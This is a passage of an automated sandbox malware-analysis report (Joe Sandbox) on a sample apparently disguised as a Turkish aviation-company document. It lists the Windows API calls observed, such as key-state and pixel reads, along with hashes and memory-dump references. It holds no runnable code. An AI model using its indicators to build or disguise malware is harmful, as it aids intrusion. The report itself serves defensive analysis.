                                                                                                                                    • Instruction Fuzzy Hash: C9514D75A04209DFCB10EFA8C8889ADB7F5FF09310B5480A9E855AB312D739ED45CF90
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0100E61F
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0100E648
                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0100E687
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0100E6AC
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0100E6B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                    • Opcode ID: dec6306a8418a2ceef8b2ac95cac7dd8269562fd61ae782d96045a615c11930d
                                                                                                                                    • Instruction ID: b18f85e0040bea1810062f1b14873571de40588ef574c70d0049ca027da7b59a
                                                                                                                                    • Opcode Fuzzy Hash: dec6306a8418a2ceef8b2ac95cac7dd8269562fd61ae782d96045a615c11930d
                                                                                                                                    • Instruction Fuzzy Hash: 4A516D75A00105DFDB01EF64C981AAEBBF5EF0A310F1480A9E849AB362CB79ED01DF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 019f4cd1bc63c8cb57a3e8a22c76a3a494e5922e9de6f3330648ab7260cb7d44
                                                                                                                                    • Instruction ID: 86d3b495afd07f999d79a4a75610a91bf4f263a9ab1d8cbdb599f11f1fff16b9
                                                                                                                                    • Opcode Fuzzy Hash: 019f4cd1bc63c8cb57a3e8a22c76a3a494e5922e9de6f3330648ab7260cb7d44
                                                                                                                                    • Instruction Fuzzy Hash: F341D635A04124EFD760DE28CC88FA9BFE4EB093A0F240595FA95A76D1CF349941DB50
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA2357
                                                                                                                                    • ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                    • Opcode ID: 84aaeae9cd3dfeaeb034db5ba7a63b30e71aa7434ca93466ea23b3b32ba5ed6d
                                                                                                                                    • Instruction ID: c17fba3df6f73ff3f0e5d266d8f7356af280121f7d8489b862e79a5a076fd8ad
                                                                                                                                    • Opcode Fuzzy Hash: 84aaeae9cd3dfeaeb034db5ba7a63b30e71aa7434ca93466ea23b3b32ba5ed6d
                                                                                                                                    • Instruction Fuzzy Hash: CF418275A04216FBCF259F68C848AEDBB75FF06370F24431AE86992290C735A950FF91
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF63E7
                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00FF6433
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00FF645C
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00FF6466
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF6475
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2108273632-0
                                                                                                                                    • Opcode ID: 7eb18e07b990360e296e880a6c0b45a08785996b4529e42a2787130654dfa6c4
                                                                                                                                    • Instruction ID: a4cca79a780bb7eb256d24bff6688ef1863b000907853a038de7f2115fe03d3c
                                                                                                                                    • Opcode Fuzzy Hash: 7eb18e07b990360e296e880a6c0b45a08785996b4529e42a2787130654dfa6c4
                                                                                                                                    • Instruction Fuzzy Hash: 3331A47190024BAFDB34DEB0DC44BB67BB8AF05360F140165E661C31B5EB2A9489F760
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FF8A30
                                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00FF8ADA
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FF8AE2
                                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00FF8AF0
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FF8AF8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                    • Opcode ID: 979eeefc760281c6b393736082df04dc98c36510c0278e931c81adf70d7ab76e
                                                                                                                                    • Instruction ID: 2798de1dd123e797df6398bf4db45c764fe9ea074a0449f8e9a59333c3f2070c
                                                                                                                                    • Opcode Fuzzy Hash: 979eeefc760281c6b393736082df04dc98c36510c0278e931c81adf70d7ab76e
                                                                                                                                    • Instruction Fuzzy Hash: 5731D17190021DEBDB24CF68D94CAAE7BB5EF05365F104219FA25E62E0C7B49911DB90
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00FFB204
                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FFB221
                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FFB259
                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FFB27F
                                                                                                                                    • _wcsstr.LIBCMT ref: 00FFB289
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902887630-0
                                                                                                                                    • Opcode ID: d0c02cc960b471f8689a70dbc57510f56196097017239e881497d184bd8a70e0
                                                                                                                                    • Instruction ID: 71ae68e068da40715e8b090744fd934a5badbf032306bd915a355973ff91566c
                                                                                                                                    • Opcode Fuzzy Hash: d0c02cc960b471f8689a70dbc57510f56196097017239e881497d184bd8a70e0
                                                                                                                                    • Instruction Fuzzy Hash: 02210332604206AAEB265A35DC09F7F7BACDF49760F10802DF904DA161EF659C41A360
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0102B192
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0102B1B7
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0102B1CF
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0102B1F8
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01010E90,00000000), ref: 0102B216
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                    • Opcode ID: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
                                                                                                                                    • Instruction ID: c442da78625c6d4accc8f6c6c90cc6ab232f82f6806dd5725177ff3c9cf9757c
                                                                                                                                    • Opcode Fuzzy Hash: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
                                                                                                                                    • Instruction Fuzzy Hash: 3C219171A10272AFDB709E3CDC04A6A3BA4FB06761F604768FAB6D71E0D73598118B90
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FF9320
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9352
                                                                                                                                    • __itow.LIBCMT ref: 00FF936A
                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9392
                                                                                                                                    • __itow.LIBCMT ref: 00FF93A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2983881199-0
                                                                                                                                    • Opcode ID: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
                                                                                                                                    • Instruction ID: 83dc79de8007909d5e921ad974e8adde93957ea3d9e258e509ed9693f2b59d68
                                                                                                                                    • Opcode Fuzzy Hash: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
                                                                                                                                    • Instruction Fuzzy Hash: 9E212831B0420C6BDB20AE609C89FFE3BADEF49760F044029FA44DB191D6B58D44A791
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(00000000), ref: 01015A6E
                                                                                                                                    • GetForegroundWindow.USER32 ref: 01015A85
                                                                                                                                    • GetDC.USER32(00000000), ref: 01015AC1
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 01015ACD
                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 01015B08
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                    • Opcode ID: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
                                                                                                                                    • Instruction ID: 07a2bd0286adcd8dc83758cfbc6c8fde50c4326746d8a50ca2b34c1ff94081aa
                                                                                                                                    • Opcode Fuzzy Hash: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
                                                                                                                                    • Instruction Fuzzy Hash: 9321A176A00204AFD720EF64DC88A9ABBF5FF89350F148079E889D7355CA78ED00DB90
                                                                                                                                    APIs
                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                                                                                    • BeginPath.GDI32(?), ref: 00FA1373
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                    • Opcode ID: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
                                                                                                                                    • Instruction ID: 0e7f769080a3d4f7e4b2e1e5cac70e15d09b10ec3db4eb99a3307eb6288fc7e1
                                                                                                                                    • Opcode Fuzzy Hash: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
                                                                                                                                    • Instruction Fuzzy Hash: 81215E71800309EFDF218F25DC4476D7BA8FB053A1F258216F890A69A4D77A9891EF90
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 01004ABA
                                                                                                                                    • __beginthreadex.LIBCMT ref: 01004AD8
                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 01004AED
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01004B03
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01004B0A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3824534824-0
                                                                                                                                    • Opcode ID: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
                                                                                                                                    • Instruction ID: b7668618b6fa14e41339889a80eeb907bdd88daa4a202dcdf582359f2b691961
                                                                                                                                    • Opcode Fuzzy Hash: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
                                                                                                                                    • Instruction Fuzzy Hash: FC112B76904206BBE7319FBCDC08B9F7FBCEB46364F244259F954D3294D67A890487A0
                                                                                                                                    APIs
                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                                                                                    • GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                    • Opcode ID: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
                                                                                                                                    • Instruction ID: 0c7b7cbaf7b0c46a37c0d7f8af8d275fa671ac9e9e7effa61fbfa81087841eb5
                                                                                                                                    • Opcode Fuzzy Hash: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
                                                                                                                                    • Instruction Fuzzy Hash: 7D016D71600209BFDB305FA5DC48D6B7BBCEF8A7A4B600429F949C2220DB329C01DB60
                                                                                                                                    APIs
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF716C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                    • Opcode ID: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                                                                                    • Instruction ID: e89ead9ae55496c3e5bd64be6e58260289b4b2ba79be9a0792a471673eb4ef7e
                                                                                                                                    • Opcode Fuzzy Hash: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                                                                                    • Instruction Fuzzy Hash: 3D01D472A00319BBCB205F24DC44BAAFBBCEF44BA1F2000A4FE44D2224D776DD01A7A0
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005260
                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0100526E
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005276
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01005280
                                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
